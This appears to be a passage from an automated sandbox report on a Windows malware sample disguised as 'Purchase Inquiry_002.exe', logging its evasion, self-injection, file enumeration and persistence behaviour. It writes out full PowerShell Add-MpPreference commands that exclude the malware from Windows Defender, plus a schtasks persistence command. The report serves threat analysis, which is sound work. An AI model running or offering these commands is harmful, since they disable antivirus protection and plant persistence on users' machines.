            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMemory allocated: 9AD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMemory allocated: 9CC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMemory allocated: ACC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,14_2_004186FE
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6373Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7235Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeWindow / User API: threadDelayed 398Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeWindow / User API: threadDelayed 9104Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeAPI coverage: 5.0 %
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 7248Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep count: 6373 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 920Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1672Thread sleep count: 173 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1516Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 7612Thread sleep count: 222 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 7612Thread sleep time: -111000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 3276Thread sleep count: 398 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 3276Thread sleep time: -1194000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 3276Thread sleep count: 9104 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 3276Thread sleep time: -27312000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe TID: 8060Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041A01B
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040B28E
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040838E
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004087A0
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00407848
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004068CD FindFirstFileW,FindNextFileW,14_2_004068CD
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0044BA59 FindFirstFileExA,14_2_0044BA59
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00417AAB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040AC78
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00406D28
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752688490.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752688490.00000000015B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004327AE
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004407B5 mov eax, dword ptr fs:[00000030h]14_2_004407B5
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,14_2_00410763
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004327AE
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004328FC SetUnhandledExceptionFilter,14_2_004328FC
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004398AC
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00432D5C
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMemory written: C:\Users\user\Desktop\Purchase Inquiry_002.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMemory written: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe14_2_00410B5C
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004175E1 mouse_event,14_2_004175E1
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Users\user\Desktop\Purchase Inquiry_002.exe "C:\Users\user\Desktop\Purchase Inquiry_002.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"Jump to behavior
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerckets
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDX\53
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDX\
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752431492.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752688490.000000000159C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDX\5
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752688490.00000000015A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004329DA cpuid 14_2_004329DA
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: EnumSystemLocalesW,14_2_0044F17B
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: EnumSystemLocalesW,14_2_0044F130
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: EnumSystemLocalesW,14_2_0044F216
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_0044F2A3
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: GetLocaleInfoA,14_2_0040E2BB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: GetLocaleInfoW,14_2_0044F4F3
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_0044F61C
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: GetLocaleInfoW,14_2_0044F723
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_0044F7F0
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: EnumSystemLocalesW,14_2_00445914
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: GetLocaleInfoW,14_2_00445E1C
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,14_2_0044EEB8
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Users\user\Desktop\Purchase Inquiry_002.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
